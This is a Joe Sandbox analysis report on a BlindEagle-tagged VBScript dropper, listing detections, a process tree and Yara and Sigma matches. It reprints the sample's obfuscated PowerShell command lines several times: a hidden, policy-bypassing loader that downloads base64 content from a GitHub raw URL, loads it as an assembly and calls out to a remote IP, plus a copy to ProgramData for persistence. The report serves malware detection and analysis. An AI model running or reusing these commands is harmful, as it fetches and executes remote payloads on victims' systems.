Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WW8kzvnphl.vbs

Overview

General Information

Sample name:WW8kzvnphl.vbs
renamed because original name is a hash value
Original sample name:2302e959d65c30ae1abd47d34d4e421bb629b9ab4a2ec04277170691bb5abefd.vbs
Analysis ID:1523826
MD5:adadc5d47f87dd519f9a7da9ba03daf5
SHA1:3de39ed4ff76305d9dc87b484bf2b78d7f332dbf
SHA256:2302e959d65c30ae1abd47d34d4e421bb629b9ab4a2ec04277170691bb5abefd
Tags:BlindEaglevbsuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Command shell drops VBS files
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7412 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WW8kzvnphl.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7464 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7628 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7740 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\autopatia.vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 7972 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\autopatia.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 8164 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\autopatia.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7464INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x2ccea:$b3: ::UTF8.GetString(
  • 0x2d493:$b3: ::UTF8.GetString(
  • 0x2da8b:$b3: ::UTF8.GetString(
  • 0x4783d:$b3: ::UTF8.GetString(
  • 0x478ea:$b3: ::UTF8.GetString(
  • 0x47ea7:$b3: ::UTF8.GetString(
  • 0x6afd7:$b3: ::UTF8.GetString(
  • 0x6b5bd:$b3: ::UTF8.GetString(
  • 0x6f482:$b3: ::UTF8.GetString(
  • 0x70911:$b3: ::UTF8.GetString(
  • 0x7483d:$b3: ::UTF8.GetString(
  • 0x74e2b:$b3: ::UTF8.GetString(
  • 0x755f9:$b3: ::UTF8.GetString(
  • 0x75daa:$b3: ::UTF8.GetString(
  • 0x7a27a:$b3: ::UTF8.GetString(
  • 0xb1160:$b3: ::UTF8.GetString(
  • 0xb174e:$b3: ::UTF8.GetString(
  • 0xb2700:$b3: ::UTF8.GetString(
  • 0xb2e3b:$b3: ::UTF8.GetString(
  • 0xb3799:$b3: ::UTF8.GetString(
  • 0xb3f1f:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 7628INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xd705:$b2: ::FromBase64String(
  • 0xf280:$b2: ::FromBase64String(
  • 0xf425:$b2: ::FromBase64String(
  • 0xf5bc:$b2: ::FromBase64String(
  • 0x240c3:$s1: -join
  • 0x2cad0:$s1: -jOIn
  • 0x2cef6:$s1: -jOIn
  • 0x2dc0b:$s1: -jOIn
  • 0x6bbf07:$s1: -join
  • 0x6c8fdc:$s1: -join
  • 0x6cc3ae:$s1: -join
  • 0x6cca60:$s1: -join
  • 0x6ce551:$s1: -join
  • 0x6d0757:$s1: -join
  • 0x6d0f7e:$s1: -join
  • 0x6d17ee:$s1: -join
  • 0x6d1f29:$s1: -join
  • 0x6d1f5b:$s1: -join
  • 0x6d1fa3:$s1: -join
  • 0x6d1fc2:$s1: -join
  • 0x6d2812:$s1: -join

Sigma Signatures

System Summary

barindex
Sigma detected: Base64 Encoded PowerShell Command Detected
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powe
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdO
Sigma detected: Potential PowerShell Command Line Obfuscation
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdO
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdO
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
